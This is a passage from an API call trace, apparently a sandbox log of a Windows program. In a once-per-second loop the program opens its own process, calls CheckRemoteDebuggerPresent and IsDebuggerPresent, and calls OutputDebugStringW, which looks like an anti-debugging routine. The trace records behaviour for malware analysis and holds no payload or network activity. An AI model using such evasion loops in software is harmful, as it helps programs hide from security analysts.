(dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x474 [0129.653] GetExitCodeProcess (in: hProcess=0x474, lpExitCode=0x2904d98 | out: lpExitCode=0x2904d98*=0x103) returned 1 [0129.653] CloseHandle (hObject=0x474) returned 1 [0129.653] OutputDebugStringW (lpOutputString="") [0130.666] GetCurrentProcessId () returned 0xf64 [0130.666] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x478 [0130.666] GetExitCodeProcess (in: hProcess=0x478, lpExitCode=0x2904fc0 | out: lpExitCode=0x2904fc0*=0x103) returned 1 [0130.667] CheckRemoteDebuggerPresent (in: hProcess=0x478, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0130.667] IsDebuggerPresent () returned 0 [0130.667] GetCurrentProcessId () returned 0xf64 [0130.667] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x47c [0130.667] GetExitCodeProcess (in: hProcess=0x47c, lpExitCode=0x2905078 | out: lpExitCode=0x2905078*=0x103) returned 1 [0130.667] CloseHandle (hObject=0x47c) returned 1 [0130.668] OutputDebugStringW (lpOutputString="") [0131.728] GetCurrentProcessId () returned 0xf64 [0131.728] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x484 [0131.728] GetExitCodeProcess (in: hProcess=0x484, lpExitCode=0x29052a0 | out: lpExitCode=0x29052a0*=0x103) returned 1 [0131.728] CheckRemoteDebuggerPresent (in: hProcess=0x484, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0131.728] IsDebuggerPresent () returned 0 [0131.728] GetCurrentProcessId () returned 0xf64 [0131.729] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x488 [0131.729] GetExitCodeProcess (in: hProcess=0x488, lpExitCode=0x2905358 | out: lpExitCode=0x2905358*=0x103) returned 1 [0131.729] CloseHandle (hObject=0x488) returned 1 [0131.729] OutputDebugStringW (lpOutputString="") [0132.771] GetCurrentProcessId () returned 0xf64 [0132.771] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x48c [0132.771] GetExitCodeProcess (in: hProcess=0x48c, lpExitCode=0x2905580 | out: lpExitCode=0x2905580*=0x103) returned 1 [0132.771] CheckRemoteDebuggerPresent (in: hProcess=0x48c, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0132.771] IsDebuggerPresent () returned 0 [0132.771] GetCurrentProcessId () returned 0xf64 [0132.772] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x490 [0132.772] GetExitCodeProcess (in: hProcess=0x490, lpExitCode=0x2905638 | out: lpExitCode=0x2905638*=0x103) returned 1 [0132.772] CloseHandle (hObject=0x490) returned 1 [0132.772] OutputDebugStringW (lpOutputString="") [0133.903] GetCurrentProcessId () returned 0xf64 [0133.903] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x494 [0133.904] GetExitCodeProcess (in: hProcess=0x494, lpExitCode=0x2905860 | out: lpExitCode=0x2905860*=0x103) returned 1 [0133.904] CheckRemoteDebuggerPresent (in: hProcess=0x494, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0133.904] IsDebuggerPresent () returned 0 [0133.904] GetCurrentProcessId () returned 0xf64 [0133.904] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x498 [0133.904] GetExitCodeProcess (in: hProcess=0x498, lpExitCode=0x2905918 | out: lpExitCode=0x2905918*=0x103) returned 1 [0133.904] CloseHandle (hObject=0x498) returned 1 [0133.904] OutputDebugStringW (lpOutputString="") [0134.924] GetCurrentProcessId () returned 0xf64 [0134.924] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x49c [0134.924] GetExitCodeProcess (in: hProcess=0x49c, lpExitCode=0x2905b40 | out: lpExitCode=0x2905b40*=0x103) returned 1 [0134.924] CheckRemoteDebuggerPresent (in: hProcess=0x49c, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0134.924] IsDebuggerPresent () returned 0 [0134.931] GetCurrentProcessId () returned 0xf64 [0134.932] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x4a0 [0134.932] GetExitCodeProcess (in: hProcess=0x4a0, lpExitCode=0x2905bf8 | out: lpExitCode=0x2905bf8*=0x103) returned 1 [0134.932] CloseHandle (hObject=0x4a0) returned 1 [0134.932] OutputDebugStringW (lpOutputString="") [0135.939] GetCurrentProcessId () returned 0xf64 [0135.939] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x4a4 [0135.940] GetExitCodeProcess (in: hProcess=0x4a4, lpExitCode=0x2905e20 | out: lpExitCode=0x2905e20*=0x103) returned 1 [0135.940] CheckRemoteDebuggerPresent (in: hProcess=0x4a4, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0135.940] IsDebuggerPresent () returned 0 [0135.940] GetCurrentProcessId () returned 0xf64 [0135.940] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x4a8 [0135.940] GetExitCodeProcess (in: hProcess=0x4a8, lpExitCode=0x2905ed8 | out: lpExitCode=0x2905ed8*=0x103) returned 1 [0135.940] CloseHandle (hObject=0x4a8) returned 1 [0135.940] OutputDebugStringW (lpOutputString="") [0136.953] GetCurrentProcessId () returned 0xf64 [0136.953] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x4ac [0136.953] GetExitCodeProcess (in: hProcess=0x4ac, lpExitCode=0x290610c | out: lpExitCode=0x290610c*=0x103) returned 1 [0136.953] CheckRemoteDebuggerPresent (in: hProcess=0x4ac, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0136.953] IsDebuggerPresent () returned 0 [0136.954] GetCurrentProcessId () returned 0xf64 [0136.954] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x4b0 [0136.954] GetExitCodeProcess (in: hProcess=0x4b0, lpExitCode=0x29061c4 | out: lpExitCode=0x29061c4*=0x103) returned 1 [0136.954] CloseHandle (hObject=0x4b0) returned 1 [0136.954] OutputDebugStringW (lpOutputString="") [0137.967] GetCurrentProcessId () returned 0xf64 [0137.967] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x4b4 [0137.967] GetExitCodeProcess (in: hProcess=0x4b4, lpExitCode=0x29063ec | out: lpExitCode=0x29063ec*=0x103) returned 1 [0137.967] CheckRemoteDebuggerPresent (in: hProcess=0x4b4, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0137.967] IsDebuggerPresent () returned 0 [0137.968] GetCurrentProcessId () returned 0xf64 [0137.968] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x4b8 [0137.968] GetExitCodeProcess (in: hProcess=0x4b8, lpExitCode=0x29064a4 | out: lpExitCode=0x29064a4*=0x103) returned 1 [0137.968] CloseHandle (hObject=0x4b8) returned 1 [0137.968] OutputDebugStringW (lpOutputString="") [0138.981] GetCurrentProcessId () returned 0xf64 [0138.981] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x4bc [0138.981] GetExitCodeProcess (in: hProcess=0x4bc, lpExitCode=0x29066cc | out: lpExitCode=0x29066cc*=0x103) returned 1 [0138.981] CheckRemoteDebuggerPresent (in: hProcess=0x4bc, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0138.982] IsDebuggerPresent () returned 0 [0138.982] GetCurrentProcessId () returned 0xf64 [0138.982] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x4c0 [0138.982] GetExitCodeProcess (in: hProcess=0x4c0, lpExitCode=0x2906784 | out: lpExitCode=0x2906784*=0x103) returned 1 [0138.982] CloseHandle (hObject=0x4c0) returned 1 [0138.983] OutputDebugStringW (lpOutputString="") [0139.995] GetCurrentProcessId () returned 0xf64 [0139.996] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x4c4 [0139.996] GetExitCodeProcess (in: hProcess=0x4c4, lpExitCode=0x29069ac | out: lpExitCode=0x29069ac*=0x103) returned 1 [0139.996] CheckRemoteDebuggerPresent (in: hProcess=0x4c4, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0139.996] IsDebuggerPresent () returned 0 [0139.996] GetCurrentProcessId () returned 0xf64 [0139.996] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x4c8 [0139.997] GetExitCodeProcess (in: hProcess=0x4c8, lpExitCode=0x2906a64 | out: lpExitCode=0x2906a64*=0x103) returned 1 [0139.997] CloseHandle (hObject=0x4c8) returned 1 [0139.997] OutputDebugStringW (lpOutputString="") [0141.009] GetCurrentProcessId () returned 0xf64 [0141.009] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x4cc [0141.009] GetExitCodeProcess (in: hProcess=0x4cc, lpExitCode=0x2906c8c | out: lpExitCode=0x2906c8c*=0x103) returned 1 [0141.009] CheckRemoteDebuggerPresent (in: hProcess=0x4cc, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0141.009] IsDebuggerPresent () returned 0 [0141.009] GetCurrentProcessId () returned 0xf64 [0141.010] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x4d0 [0141.010] GetExitCodeProcess (in: hProcess=0x4d0, lpExitCode=0x2906d44 | out: lpExitCode=0x2906d44*=0x103) returned 1 [0141.010] CloseHandle (hObject=0x4d0) returned 1 [0141.010] OutputDebugStringW (lpOutputString="") [0142.023] GetCurrentProcessId () returned 0xf64 [0142.023] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x4d4 [0142.024] GetExitCodeProcess (in: hProcess=0x4d4, lpExitCode=0x2906f6c | out: lpExitCode=0x2906f6c*=0x103) returned 1 [0142.024] CheckRemoteDebuggerPresent (in: hProcess=0x4d4, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0142.024] IsDebuggerPresent () returned 0 [0142.024] GetCurrentProcessId () returned 0xf64 [0142.024] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x4d8 [0142.024] GetExitCodeProcess (in: hProcess=0x4d8, lpExitCode=0x2907024 | out: lpExitCode=0x2907024*=0x103) returned 1 [0142.024] CloseHandle (hObject=0x4d8) returned 1 [0142.025] OutputDebugStringW (lpOutputString="") [0143.037] GetCurrentProcessId () returned 0xf64 [0143.037] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x4dc [0143.037] GetExitCodeProcess (in: hProcess=0x4dc, lpExitCode=0x290724c | out: lpExitCode=0x290724c*=0x103) returned 1 [0143.037] CheckRemoteDebuggerPresent (in: hProcess=0x4dc, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0143.037] IsDebuggerPresent () returned 0 [0143.038] GetCurrentProcessId () returned 0xf64 [0143.038] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x4e0 [0143.038] GetExitCodeProcess (in: hProcess=0x4e0, lpExitCode=0x2907304 | out: lpExitCode=0x2907304*=0x103) returned 1 [0143.038] CloseHandle (hObject=0x4e0) returned 1 [0143.038] OutputDebugStringW (lpOutputString="") [0144.051] GetCurrentProcessId () returned 0xf64 [0144.051] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x4e4 [0144.051] GetExitCodeProcess (in: hProcess=0x4e4, lpExitCode=0x290752c | out: lpExitCode=0x290752c*=0x103) returned 1 [0144.051] CheckRemoteDebuggerPresent (in: hProcess=0x4e4, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0144.051] IsDebuggerPresent () returned 0 [0144.052] GetCurrentProcessId () returned 0xf64 [0144.052] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x4e8 [0144.052] GetExitCodeProcess (in: hProcess=0x4e8, lpExitCode=0x29075e4 | out: lpExitCode=0x29075e4*=0x103) returned 1 [0144.052] CloseHandle (hObject=0x4e8) returned 1 [0144.052] OutputDebugStringW (lpOutputString="") [0145.065] GetCurrentProcessId () returned 0xf64 [0145.065] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x4ec [0145.065] GetExitCodeProcess (in: hProcess=0x4ec, lpExitCode=0x290780c | out: lpExitCode=0x290780c*=0x103) returned 1 [0145.065] CheckRemoteDebuggerPresent (in: hProcess=0x4ec, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0145.065] IsDebuggerPresent () returned 0 [0145.066] GetCurrentProcessId () returned 0xf64 [0145.066] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x4f0 [0145.066] GetExitCodeProcess (in: hProcess=0x4f0, lpExitCode=0x29078c4 | out: lpExitCode=0x29078c4*=0x103) returned 1 [0145.066] CloseHandle (hObject=0x4f0) returned 1 [0145.066] OutputDebugStringW (lpOutputString="") [0146.079] GetCurrentProcessId () returned 0xf64 [0146.079] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x4f4 [0146.079] GetExitCodeProcess (in: hProcess=0x4f4, lpExitCode=0x2907aec | out: lpExitCode=0x2907aec*=0x103) returned 1 [0146.080] CheckRemoteDebuggerPresent (in: hProcess=0x4f4, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0146.080] IsDebuggerPresent () returned 0 [0146.080] GetCurrentProcessId () returned 0xf64 [0146.080] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x4f8 [0146.080] GetExitCodeProcess (in: hProcess=0x4f8, lpExitCode=0x2907ba4 | out: lpExitCode=0x2907ba4*=0x103) returned 1 [0146.080] CloseHandle (hObject=0x4f8) returned 1 [0146.080] OutputDebugStringW (lpOutputString="") [0147.108] GetCurrentProcessId () returned 0xf64 [0147.109] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x4fc [0147.109] GetExitCodeProcess (in: hProcess=0x4fc, lpExitCode=0x2907dcc | out: lpExitCode=0x2907dcc*=0x103) returned 1 [0147.109] CheckRemoteDebuggerPresent (in: hProcess=0x4fc, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0147.109] IsDebuggerPresent () returned 0 [0147.109] GetCurrentProcessId () returned 0xf64 [0147.109] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x500 [0147.109] GetExitCodeProcess (in: hProcess=0x500, lpExitCode=0x2907e84 | out: lpExitCode=0x2907e84*=0x103) returned 1 [0147.109] CloseHandle (hObject=0x500) returned 1 [0147.109] OutputDebugStringW (lpOutputString="") [0148.125] GetCurrentProcessId () returned 0xf64 [0148.126] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x504 [0148.126] GetExitCodeProcess (in: hProcess=0x504, lpExitCode=0x29080b8 | out: lpExitCode=0x29080b8*=0x103) returned 1 [0148.126] CheckRemoteDebuggerPresent (in: hProcess=0x504, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0148.126] IsDebuggerPresent () returned 0 [0148.126] GetCurrentProcessId () returned 0xf64 [0148.126] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x508 [0148.127] GetExitCodeProcess (in: hProcess=0x508, lpExitCode=0x2908170 | out: lpExitCode=0x2908170*=0x103) returned 1 [0148.127] CloseHandle (hObject=0x508) returned 1 [0148.127] OutputDebugStringW (lpOutputString="") [0149.139] GetCurrentProcessId () returned 0xf64 [0149.140] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x50c [0149.140] GetExitCodeProcess (in: hProcess=0x50c, lpExitCode=0x2908398 | out: lpExitCode=0x2908398*=0x103) returned 1 [0149.140] CheckRemoteDebuggerPresent (in: hProcess=0x50c, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0149.140] IsDebuggerPresent () returned 0 [0149.141] GetCurrentProcessId () returned 0xf64 [0149.141] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x510 [0149.141] GetExitCodeProcess (in: hProcess=0x510, lpExitCode=0x2908450 | out: lpExitCode=0x2908450*=0x103) returned 1 [0149.141] CloseHandle (hObject=0x510) returned 1 [0149.141] OutputDebugStringW (lpOutputString="") [0150.151] GetCurrentProcessId () returned 0xf64 [0150.152] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x514 [0150.152] GetExitCodeProcess (in: hProcess=0x514, lpExitCode=0x2908678 | out: lpExitCode=0x2908678*=0x103) returned 1 [0150.152] CheckRemoteDebuggerPresent (in: hProcess=0x514, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0150.152] IsDebuggerPresent () returned 0 [0150.152] GetCurrentProcessId () returned 0xf64 [0150.152] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x518 [0150.152] GetExitCodeProcess (in: hProcess=0x518, lpExitCode=0x2908730 | out: lpExitCode=0x2908730*=0x103) returned 1 [0150.153] CloseHandle (hObject=0x518) returned 1 [0150.153] OutputDebugStringW (lpOutputString="") [0151.164] GetCurrentProcessId () returned 0xf64 [0151.165] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x51c [0151.165] GetExitCodeProcess (in: hProcess=0x51c, lpExitCode=0x2908958 | out: lpExitCode=0x2908958*=0x103) returned 1 [0151.165] CheckRemoteDebuggerPresent (in: hProcess=0x51c, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0151.165] IsDebuggerPresent () returned 0 [0151.165] GetCurrentProcessId () returned 0xf64 [0151.165] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x520 [0151.166] GetExitCodeProcess (in: hProcess=0x520, lpExitCode=0x2908a10 | out: lpExitCode=0x2908a10*=0x103) returned 1 [0151.166] CloseHandle (hObject=0x520) returned 1 [0151.166] OutputDebugStringW (lpOutputString="") [0152.179] GetCurrentProcessId () returned 0xf64 [0152.179] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x524 [0152.179] GetExitCodeProcess (in: hProcess=0x524, lpExitCode=0x2908c38 | out: lpExitCode=0x2908c38*=0x103) returned 1 [0152.179] CheckRemoteDebuggerPresent (in: hProcess=0x524, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0152.179] IsDebuggerPresent () returned 0 [0152.179] GetCurrentProcessId () returned 0xf64 [0152.180] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x528 [0152.180] GetExitCodeProcess (in: hProcess=0x528, lpExitCode=0x2908cf0 | out: lpExitCode=0x2908cf0*=0x103) returned 1 [0152.180] CloseHandle (hObject=0x528) returned 1 [0152.180] OutputDebugStringW (lpOutputString="") [0153.193] GetCurrentProcessId () returned 0xf64 [0153.193] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x52c [0153.193] GetExitCodeProcess (in: hProcess=0x52c, lpExitCode=0x2908f18 | out: lpExitCode=0x2908f18*=0x103) returned 1 [0153.193] CheckRemoteDebuggerPresent (in: hProcess=0x52c, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0153.193] IsDebuggerPresent () returned 0 [0153.193] GetCurrentProcessId () returned 0xf64 [0153.194] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x530 [0153.194] GetExitCodeProcess (in: hProcess=0x530, lpExitCode=0x2908fd0 | out: lpExitCode=0x2908fd0*=0x103) returned 1 [0153.194] CloseHandle (hObject=0x530) returned 1 [0153.194] OutputDebugStringW (lpOutputString="") [0154.207] GetCurrentProcessId () returned 0xf64 [0154.207] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x534 [0154.207] GetExitCodeProcess (in: hProcess=0x534, lpExitCode=0x29091f8 | out: lpExitCode=0x29091f8*=0x103) returned 1 [0154.207] CheckRemoteDebuggerPresent (in: hProcess=0x534, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0154.207] IsDebuggerPresent () returned 0 [0154.208] GetCurrentProcessId () returned 0xf64 [0154.208] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x538 [0154.208] GetExitCodeProcess (in: hProcess=0x538, lpExitCode=0x29092b0 | out: lpExitCode=0x29092b0*=0x103) returned 1 [0154.208] CloseHandle (hObject=0x538) returned 1 [0154.209] OutputDebugStringW (lpOutputString="") [0155.220] GetCurrentProcessId () returned 0xf64 [0155.221] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x53c [0155.221] GetExitCodeProcess (in: hProcess=0x53c, lpExitCode=0x29094d8 | out: lpExitCode=0x29094d8*=0x103) returned 1 [0155.221] CheckRemoteDebuggerPresent (in: hProcess=0x53c, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0155.221] IsDebuggerPresent () returned 0 [0155.221] GetCurrentProcessId () returned 0xf64 [0155.221] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x540 [0155.222] GetExitCodeProcess (in: hProcess=0x540, lpExitCode=0x2909590 | out: lpExitCode=0x2909590*=0x103) returned 1 [0155.222] CloseHandle (hObject=0x540) returned 1 [0155.222] OutputDebugStringW (lpOutputString="") [0156.235] GetCurrentProcessId () returned 0xf64 [0156.235] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x544 [0156.235] GetExitCodeProcess (in: hProcess=0x544, lpExitCode=0x29097b8 | out: lpExitCode=0x29097b8*=0x103) returned 1 [0156.235] CheckRemoteDebuggerPresent (in: hProcess=0x544, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0156.235] IsDebuggerPresent () returned 0 [0156.235] GetCurrentProcessId () returned 0xf64 [0156.235] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x548 [0156.236] GetExitCodeProcess (in: hProcess=0x548, lpExitCode=0x2909870 | out: lpExitCode=0x2909870*=0x103) returned 1 [0156.236] CloseHandle (hObject=0x548) returned 1 [0156.236] OutputDebugStringW (lpOutputString="") [0157.252] GetCurrentProcessId () returned 0xf64 [0157.252] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x54c [0157.252] GetExitCodeProcess (in: hProcess=0x54c, lpExitCode=0x2909a98 | out: lpExitCode=0x2909a98*=0x103) returned 1 [0157.252] CheckRemoteDebuggerPresent (in: hProcess=0x54c, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0157.252] IsDebuggerPresent () returned 0 [0157.252] GetCurrentProcessId () returned 0xf64 [0157.253] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x550 [0157.253] GetExitCodeProcess (in: hProcess=0x550, lpExitCode=0x2909b50 | out: lpExitCode=0x2909b50*=0x103) returned 1 [0157.253] CloseHandle (hObject=0x550) returned 1 [0157.253] OutputDebugStringW (lpOutputString="") [0158.263] GetCurrentProcessId () returned 0xf64 [0158.264] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x554 [0158.264] GetExitCodeProcess (in: hProcess=0x554, lpExitCode=0x2909d78 | out: lpExitCode=0x2909d78*=0x103) returned 1 [0158.264] CheckRemoteDebuggerPresent (in: hProcess=0x554, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0158.264] IsDebuggerPresent () returned 0 [0158.265] GetCurrentProcessId () returned 0xf64 [0158.265] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x558 [0158.265] GetExitCodeProcess (in: hProcess=0x558, lpExitCode=0x2909e30 | out: lpExitCode=0x2909e30*=0x103) returned 1 [0158.265] CloseHandle (hObject=0x558) returned 1 [0158.266] OutputDebugStringW (lpOutputString="") [0159.277] GetCurrentProcessId () returned 0xf64 [0159.277] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x55c [0159.277] GetExitCodeProcess (in: hProcess=0x55c, lpExitCode=0x290a064 | out: lpExitCode=0x290a064*=0x103) returned 1 [0159.277] CheckRemoteDebuggerPresent (in: hProcess=0x55c, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0159.277] IsDebuggerPresent () returned 0 [0159.277] GetCurrentProcessId () returned 0xf64 [0159.277] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x560 [0159.278] GetExitCodeProcess (in: hProcess=0x560, lpExitCode=0x290a11c | out: lpExitCode=0x290a11c*=0x103) returned 1 [0159.278] CloseHandle (hObject=0x560) returned 1 [0159.278] OutputDebugStringW (lpOutputString="") [0160.291] GetCurrentProcessId () returned 0xf64 [0160.292] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x564 [0160.292] GetExitCodeProcess (in: hProcess=0x564, lpExitCode=0x290a344 | out: lpExitCode=0x290a344*=0x103) returned 1 [0160.292] CheckRemoteDebuggerPresent (in: hProcess=0x564, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0160.292] IsDebuggerPresent () returned 0 [0160.292] GetCurrentProcessId () returned 0xf64 [0160.292] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x568 [0160.292] GetExitCodeProcess (in: hProcess=0x568, lpExitCode=0x290a3fc | out: lpExitCode=0x290a3fc*=0x103) returned 1 [0160.292] CloseHandle (hObject=0x568) returned 1 [0160.293] OutputDebugStringW (lpOutputString="") [0161.317] GetCurrentProcessId () returned 0xf64 [0161.317] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x56c [0161.317] GetExitCodeProcess (in: hProcess=0x56c, lpExitCode=0x290a624 | out: lpExitCode=0x290a624*=0x103) returned 1 [0161.317] CheckRemoteDebuggerPresent (in: hProcess=0x56c, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0161.318] IsDebuggerPresent () returned 0 [0161.318] GetCurrentProcessId () returned 0xf64 [0161.318] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x570 [0161.318] GetExitCodeProcess (in: hProcess=0x570, lpExitCode=0x290a6dc | out: lpExitCode=0x290a6dc*=0x103) returned 1 [0161.318] CloseHandle (hObject=0x570) returned 1 [0161.318] OutputDebugStringW (lpOutputString="") [0162.319] GetCurrentProcessId () returned 0xf64 [0162.319] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x574 [0162.319] GetExitCodeProcess (in: hProcess=0x574, lpExitCode=0x290a904 | out: lpExitCode=0x290a904*=0x103) returned 1 [0162.319] CheckRemoteDebuggerPresent (in: hProcess=0x574, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0162.320] IsDebuggerPresent () returned 0 [0162.320] GetCurrentProcessId () returned 0xf64 [0162.320] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x578 [0162.320] GetExitCodeProcess (in: 